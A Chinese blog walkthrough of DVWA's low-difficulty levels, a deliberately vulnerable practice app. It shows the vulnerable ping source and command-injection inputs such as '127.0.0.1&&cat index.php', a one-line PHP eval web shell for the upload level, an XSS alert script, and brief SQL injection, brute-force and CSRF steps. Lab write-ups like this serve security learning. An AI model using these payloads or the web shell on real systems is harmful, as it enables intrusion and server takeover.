Dvwa的低难度通关

搭建

使用docker搭建
docker search dvwa
docker pull xxx
docker run xxx
详细说一下搭建后的情况

低难度通关

搭建好后想先看一下源代码的,然后发现有这么多种php文件,应该是说的表示难度。

在这里插入图片描述
难度的选择在这里更改
在这里插入图片描述

brute force

查看low.php的源代码
在这里插入图片描述
发现没有任何的防御手段,我们直接用burp抓包,进行暴力破解
在这里插入图片描述
给password留上标记后我们导入字典开始破解

在这里插入图片描述

到最后就能知道密码是password

Command Injection

查看源代码

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?> 

没有任何防护措施
我们直接可以利用构造与布尔值差不多的命令行来获取信息
例如|ls利用来达到我们的目的
在这里插入图片描述
也可以利用&& 来达到目的
127.0.0.1&&cat index.php

在这里插入图片描述

CSRF

这里构造好url,用户打开url即可成功。
在这里插入图片描述
那么如何诱导用户点击呢?
在这里插入图片描述
用burp构造一个html文件诱导他点击
在这里插入图片描述

File Inclusion

通过文件包含漏洞,利用一下相对路径访问到phpinfo.php
在这里插入图片描述

File Upload

这里没有限制
我们直接写好一句话木马
<?php @eval($_POST['123']) ?>
上传上去

SQL Injection

我们直接 '发现有报错注入
在这里插入图片描述
然后就可以开始用联合查询啥的了
但是结果是这样的
在这里插入图片描述
密码使用了md5加密
我们搜索md5转换,就能得到正确结果
在这里插入图片描述

SQL Injection (Blind)

盲注的话,采用时间盲注就行

XSS (Reflected)

直接采用
<script>alert('hacked')</script>注入
在这里插入图片描述

XSS (Stored)

同上
在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值